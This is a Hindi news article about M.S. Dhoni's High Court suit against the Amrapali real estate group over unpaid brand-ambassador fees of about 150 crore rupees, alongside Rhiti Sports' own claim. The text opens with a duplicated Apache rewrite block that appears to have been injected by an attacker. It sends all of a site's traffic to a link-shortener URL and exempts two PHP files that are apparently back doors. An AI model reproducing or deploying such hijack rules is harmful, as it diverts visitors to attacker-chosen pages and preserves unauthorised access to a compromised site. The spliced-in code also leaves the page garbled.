
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 316
रांची। भारतीय क्रिकेट टीम के पूर्व कप्तान महेंद्र सिंह धोनी अब आम्रपाली ग्रुप के खिलाफ लड़ने के लिए पूरी तरह से फार्म में आ गए हैं। धोनी ने आरोप लगाया है कि रियल एस्टेट कंपनी आम्रपाली का ब्रांड एंबेसडर बनने के कई सालों तक उन्हें पेमेंट नहीं मिला, कंपनी के ऊपर धोनी का 150 करोड़ रुपए बकाया है, जिसे वसूलने के लिए धोनी ने अब हाईकोर्ट का सहारा लिया है। धोनी ने किया केस केवल धोनी ने ही आम्रपाली के ऊपर केस नहीं किया है बल्कि क्रिकेटर्स के एंडोर्समेंट संभालने वाली फर्म रति स्पोर्टस ने भी आम्रपाली ग्रुप के खिलाफ बकाया पैसों के लिए केस लिया है। रति स्पोर्टस के मैनेजिंग डायरेक्टर अरुण पांडे ने मीडिया में बयान दिया है कि कंपनी ने ब्रैंडिंग और मार्केटिंग ऐक्टिविटीज के लिए हमें पैसा नहीं दिया है, कंपनी के ऊपर हमारा 200 करोड़ रुपए बकाया है। गौरतलब है कि रियल एस्टेट कंपनी आम्रपाली ग्रुप पिछले काफी वक्त से घाटे में चल रही है। Expand आम्रपाली ग्रुप के ब्रांड एंबेसडर थे माही आपको बता दें कि भारत के सफलतम कप्तानों में से एक कहे जाने वाले महेंद्र सिंह धोनी करीब 6-7 सालों तक आम्रपाली ग्रुप के ब्रांड एंबेसडर रहे हैं। इसलिए जब आम्रपाली ग्रुप ने लोगों से पैसे लेकर हाउसिंग प्रॉजेक्ट को पूरा नहीं किया तो लोगों ने सोशल मीडिया पर माही को ही निशाना बनाया था, लोगों ने धोनी को काफी कोसा था कि वो एक चिट करने वाली कंपनी का प्रचार कैसे कर सकते हैं, हमने उन पर भरोसा करके आम्रपाली ग्रुप में पैसा लगाया था। 2016 में धोनी ने तोड़ा कंपनी से करार बवाल मचने के बाद साल 2016 में धोनी ने कंपनी से ब्रैंड ऐंबैसडर के तौर पर अपना नाता तोड़ लिया था। लेकिन इस दौरान धोनी और उनके परिवार वालों की इस मसले पर काफी किरकरी हुई थी।
मालूम हो कि आम्रपाली ने 2011 में क्रिकेट वर्ल्ड कप में भारत की जीत के बाद टीम इंडिया के प्रत्येक सदस्य को नोएडा एक्सटेंशन में आम्रपाली ड्रीम वैली प्रॉजेक्ट में एक विला तोहफे के तौर पर दिया था। धोनी टीम के कैप्टन थे इसलिए उन्हें 1 करोड़ रुपये की कीमत वाला और टीम के बाकी सदस्यों को 55 लाख रुपये प्रत्येक का विला दिया गया था। आम्रपाली ग्रुप को नोएडा और ग्रेटर नोएडा में 10 हाउसिंग प्रॉजेक्ट्स में लगभग 40,000 फ्लैट की डिलीवरी देनी है, जो कब पूरी होगी उसे कह पाना फिलहाल तो मुश्किल है।